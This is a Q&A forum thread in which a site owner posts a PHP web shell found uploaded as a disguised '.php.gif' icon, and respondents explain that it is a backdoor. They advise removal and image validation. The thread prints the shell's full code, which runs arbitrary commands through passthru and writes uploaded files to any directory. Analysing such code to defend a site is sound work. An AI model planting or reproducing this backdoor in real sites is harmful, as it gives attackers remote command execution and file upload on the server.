# Possible website hack attempt

Tags: php, validation

I just got a warming message from my host telling me..
"we have detected a malicious attempt to access your account via http or ftp"

Having checked the malicious file, someone has uploaded an icon with the name "bh556.php.gif"

Opening this file it contains the following code:

```
<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>

<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
   $pwddir = $_POST['dir'];
   $real = $_FILES['file']['name'];
   $dez = $pwddir."/".$real;
   copy($uploaded, $dez);
   echo "FILE UPLOADED TO $dez";
}
?>     </pre>
<form name="form1" method="post" enctype="multipart/form-data">
 <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
 <input type="submit" name="submit2" value="Upload">
 <input type="file" name="file" size="15">
      </td>
    </tr>
</table>
</body>
</html>
```

Could someone please explain how to prevent this being uploaded via an icon again, and also please explain what exactly the above code was doing?

Comment: `"Whats the code doing?"` Trying to create a backdoor that could be used to upload other files and run arbitary php code on your server. `"how to prevent this"` validate images in your upload script, to check they are actually images: http://stackoverflow.com/questions/7393419/what-is-the-best-and-fastest-way-to-check-if-the-image-is-valid-in-php

Answer (score 5):

It's a PHP Webshell, see [here](https://github.com/JohnTroony/php-webshells) for a list of common ones. It allows a malicious user to execute commands via a PHP file, which is extremely compromising.

Hiding them in images via headers and some clever tricks is common, see the explanation [here](https://www.trustwave.com/Resources/SpiderLabs-Blog/Hiding-Webshell-Backdoor-Code-in-Image-Files/)

My advice, remove the file, address the cause of the leak, which is probably an injection attack of some description.

Comment: I  would bet he used website's file upload function to upload a shell disguised as .gif, hoping that the upload script will remove .gif extension and make it .php. Then he would be able to control the website via his file. However, I dont think this shell would work, I found some programming mistakes in the shellcode. For example, <form> tag is not closed.